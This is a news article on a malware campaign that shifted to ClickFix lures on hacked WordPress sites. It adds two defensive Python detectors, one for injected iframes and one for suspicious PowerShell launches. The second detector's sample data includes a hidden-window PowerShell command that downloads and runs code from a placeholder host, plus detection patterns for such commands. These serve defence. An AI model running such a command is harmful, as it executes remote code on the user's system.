Dark Reading
'Lorem Ipsum' Malware Pivots to ClickFix Delivery
New analysis shows the campaign, which uses compromised WordPress sites, may be linked to the ransomware and data extortion group Vice Society.
Jai Vijayan, Contributing Writer
June 16, 2026
4 Min Read
SOURCE: M REHAN330 VIA SHUTTERSTOCK
Microsoft's disruption of malware-signing-as-a-service provider Fox Tempest last month has forced the operators of the Lorem Ipsum shellcode loader and backdoor to abandon their delivery method of Trojanized Microsoft Teams installers in favor of ClickFix lures.
Researchers at BlueVoyant, who have tracked the Lorem Ipsum campaign since February 2026, observed the shift in late May, just days after Microsoft dismantled the Fox Tempest (aka Forging Marauder) infrastructure and revoked more than 1,000 fraudulently obtained Microsoft Trusted Signing certificates. While the takedown may have temporarily disrupted the threat actors behind Lorem Ipsum, they quickly moved to a new and potentially more dangerous delivery model.
Making a Quick Pivot to ClickFix
"The loss of certificate supply rendered the previous signed-installer delivery model unviable, forcing the operators to adopt a delivery mechanism that eliminates code signing entirely," BlueVoyant said in its report on Tuesday.
Instead, the threat actors are now relying on ClickFix lures hosted on compromised WordPress sites to deliver their malware. "The pivot significantly broadens the potential victim pool from users who encountered fake Microsoft Teams installers on SEO-poisoned and malvertised download portals to anyone browsing one of the compromised WordPress sites," the company noted.
BlueVoyant had initially assessed Lorem Ipsum to be a rapidly maturing malware campaign, launched in February 2026 and likely operated by a sophisticated, mid-tier initial access broker. The company has since revised that assessment and now strongly believes the campaign is linked to Rapid Brigantine, a financially motivated cybercriminal group also tracked as Vanilla Tempest, DEV-0832, and Vice Society. The threat actor has been active since at least mid-2022 and is associated with multiple ransomware families including Rhysida, BlackCat, Zeppelin, and Quantum Locker, according to BlueVoyant.
The Lorem Ipsum campaign initially relied on SEO poisoning to lure users into downloading Trojanized Microsoft Teams installers signed with valid Microsoft Trusted Signing certificates. Victims who ran the fake installers unknowingly deployed a multistage shellcode loader and backdoor that gave the attackers a foothold on their systems.
BlueVoyant's analysis found Lorem Ipsum using a sophisticated, multistage infection chain with DLL sideloading, encrypted payloads, and a command-and-control (C2) mechanism that abused the legitimate Indian blogging platform LetsDiskuss[.]com as a dead-drop to retrieve C2 server addresses. The malware also assigns unique identifiers to track and manage individual victim infections, according to BlueVoyant.
ClickFix Lures on WordPress Sites
For the new ClickFix delivery model, Lorem Ipsum's operator is currently using at least five legitimate but compromised WordPress websites to host its ClickFix lures. The attack chain begins when a user arrives at one of the websites, which span multiple sectors including architecture, legal services and construction technology. An injected iframe on the website displays a fake browser update notification about the user's browser being out of date.
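The injected iframe is the piece of this chain a WordPress site owner can check for directly. The script below is an added example, not BlueVoyant's tooling or anything from the compromised sites: it collects every iframe in a page and flags frames whose source is off-site or whose styling hides or off-screens them. The sample page and the host names ending in .invalid are constructed for the example.

```python
"""Flag <iframe> elements in a WordPress page that point off-site or are
styled to be hidden. Added example; not BlueVoyant's or WordPress's code.
The sample page and the host names ending in .invalid are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Styling commonly used to keep an injected frame out of sight.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|opacity\s*:\s*0(?![.\d])"
    r"|(?:width|height)\s*:\s*0(?:px)?\b|(?:left|top)\s*:\s*-\d{3,}px",
    re.I,
)


class IframeCollector(HTMLParser):
    """Collect the attribute set of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            # attrs is a list of (name, value); value is None for bare attrs
            self.iframes.append(dict(attrs))


def suspicious_iframes(html, site_host):
    """Return [(src, [reasons])] for frames a site owner should review."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        host = (urlparse(src).hostname or "").lower()
        reasons = []
        # A frame loading from another origin is the primary signal: the
        # article describes a visible fake-update notice, not a hidden frame.
        if host and host != site_host and not host.endswith("." + site_host):
            reasons.append(f"off-site src host {host}")
        style = attrs.get("style") or ""
        if "hidden" in attrs or HIDDEN_STYLE.search(style):
            reasons.append("hidden or off-screen styling")
        if attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1"):
            reasons.append("zero- or one-pixel size")
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed page: one legitimate same-origin embed, one injected frame.
SAMPLE_HTML = """<html><body>
<iframe src="https://example-firm.invalid/embed/office-map" width="600" height="400"></iframe>
<p>Our projects</p>
<iframe src="https://compromised-cdn.invalid/browser-update.html"
        style="position:fixed;top:0;left:0;width:100%;height:100%;border:0"></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, reasons in suspicious_iframes(SAMPLE_HTML, "example-firm.invalid"):
        print(src, "->", "; ".join(reasons))
```

Run it against the rendered HTML of each page (what a visitor receives, not the theme files), since injections of this kind are often added at render time by a compromised plugin or a modified database option rather than sitting in a template on disk.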
In a manner similar to other ClickFix scams, the pop-up instructs the user to paste a provided PowerShell command, disguised as a Microsoft Edge security intelligence update, into their Windows Terminal. Running that command silently downloads and executes the Lorem Ipsum malware in the background while displaying a fake success message telling the user their browser has been successfully updated.
A Troubling Connection to Ransomware Actors
BlueVoyant's view that Lorem Ipsum is linked to Rapid Brigantine is significant for defenders because it suggests the campaign is part of a broader ransomware operation with a history of deploying destructive payloads against victims. According to the security vendor, there are multiple indicators that the two operations are linked. These include a Microsoft report in October 2025 that described an SEO poisoning-driven Vanilla Tempest campaign involving Teams installers; the shared use of Forging Marauder/Fox Tempest for obtaining malware signing certificates; and a DFIR report in which a Lorem Ipsum-associated loader delivered a backdoor associated with Rapid Brigantine.
The Lorem Ipsum campaign is the latest example of the resilience modern threat actors have built up against attempts to disrupt their operations. Rather than allowing Microsoft's takedown of the Fox Tempest signing service to disrupt their operations, Lorem Ipsum actors pivoted to a new delivery model that has actually heightened their threat profile.
For defenders, the broader implication is that detection and prevention strategies cannot rely on assumptions about initial access vectors. Instead, organizations need to anticipate fast-moving, multichannel delivery models that combine social engineering, legitimate Web infrastructure abuse, and user execution of malicious commands, BlueVoyant noted.
"Defending against this ClickFix campaign and the broader Rapid Brigantine post-exploitation activity that typically follows requires prioritizing behavioral detections over static indicators, given the operators' demonstrated capacity for rapid pivot in response to disruption," the security vendor said. "The most operationally valuable controls focus on the consistent behaviors that span Rapid Brigantine's multiple delivery pipelines," rather than individual delivery mechanisms or malware variants.
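The pasted-command step described under "ClickFix Lures on WordPress Sites" and the behavior-over-indicators advice just quoted point at the same detection: PowerShell started from an interactive parent such as Windows Terminal, with a hidden window and a download-then-execute command line, regardless of which site or domain is involved. The script below is an added example and not BlueVoyant's detection content; it scores constructed Sysmon Event ID 1-style process-creation records with weights chosen for this example, and the .invalid host in the sample command is a placeholder.

```python
"""Score process-creation events for the behavior a ClickFix lure produces:
PowerShell started from an interactive parent, with a hidden window and a
download-then-execute command line. Added example, not BlueVoyant's
detection content; the records below are constructed Sysmon Event ID 1
style entries and the .invalid host is a placeholder."""
import re

INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

DOWNLOAD = re.compile(
    r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|"
    r"downloadfile|net\.webclient|start-bitstransfer|curl|wget)\b", re.I)
IN_MEMORY_EXEC = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
HIDDEN_WINDOW = re.compile(r"-w[a-z]*\s+hidden\b", re.I)
ENCODED = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+[a-z0-9+/=]{20,}", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons); the weights are this example's choice."""
    if basename(ev["Image"]) not in POWERSHELL:
        return 0, []
    cmd, score, reasons = ev["CommandLine"], 0, []
    parent = basename(ev["ParentImage"])
    if parent in INTERACTIVE_PARENTS:
        score += 1
        reasons.append(f"started from interactive parent {parent}")
    for pattern, weight, label in (
        (HIDDEN_WINDOW, 2, "hidden window"),
        (DOWNLOAD, 2, "download primitive"),
        (IN_MEMORY_EXEC, 2, "in-memory execution"),
        (ENCODED, 2, "encoded command"),
    ):
        if pattern.search(cmd):
            score += weight
            reasons.append(label)
    return score, reasons


def detect(events, threshold=4):
    """Return [(record id, score, reasons)] for events at or above threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["RecordId"], score, reasons))
    return hits


# Constructed records: A and C are routine admin activity, D is an analyst
# fetching a report, B is the pasted ClickFix-style command.
EVENTS = [
    {"RecordId": "A", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"RecordId": "B", "ParentImage": r"C:\Program Files\WindowsApps\Terminal\WindowsTerminal.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr https://compromised-cdn.invalid/edge-update); '
                    'Write-Host \'Microsoft Edge security intelligence updated\'"'},
    {"RecordId": "C", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\ProgramData\agent\update.ps1"},
    {"RecordId": "D", "ParentImage": r"C:\Program Files\WindowsApps\Terminal\WindowsTerminal.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": 'pwsh -c "Invoke-WebRequest https://reports.example/q2.csv -OutFile q2.csv"'},
]

if __name__ == "__main__":
    for record_id, score, reasons in detect(EVENTS):
        print(record_id, score, "; ".join(reasons))
```

The threshold is what keeps this behavioral rather than a keyword match: an analyst downloading a file from a terminal (record D) scores below it, while the combination of interactive parent, hidden window, download and in-memory execution (record B) is flagged without any reference to a URL or file hash. Feed it real events by mapping your log source's fields onto Image, ParentImage and CommandLine, and tune the weights against a week of your own baseline.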
About the Author
Jai Vijayan
Contributing Writer
Illinois-based Jai Vijayan is a veteran, award-winning technology journalist with more than 25 years of experience covering cybersecurity. His information security reporting has explored everything from ransomware, nation-state threats, and identity security to AI risk, critical infrastructure protection, software supply chain security, cloud security and emerging enterprise technologies.
Over the course of his career, Jai has written news stories, feature articles, survey reports, white papers, and e-books for enterprise and technology audiences. He has also moderated panel discussions and executive roundtables featuring CISOs, security researchers, and industry leaders.
Jai previously served as senior editor at Computerworld, where he covered information security and data-privacy issues. His work has also appeared in CSO Online, InformationWeek, The Christian Science Monitor Passcode, The Economic Times, and other publications.
His work has earned multiple industry honors, including a Joint ASBPE Excellence Award for Best Coverage of Government IT, and a Joint Jesse H. Neal Award for wireless LAN security coverage. Jai holds a Master’s degree in statistics from Bangalore University, and studied broadcasting and electronic communication at Marquette University in Milwaukee.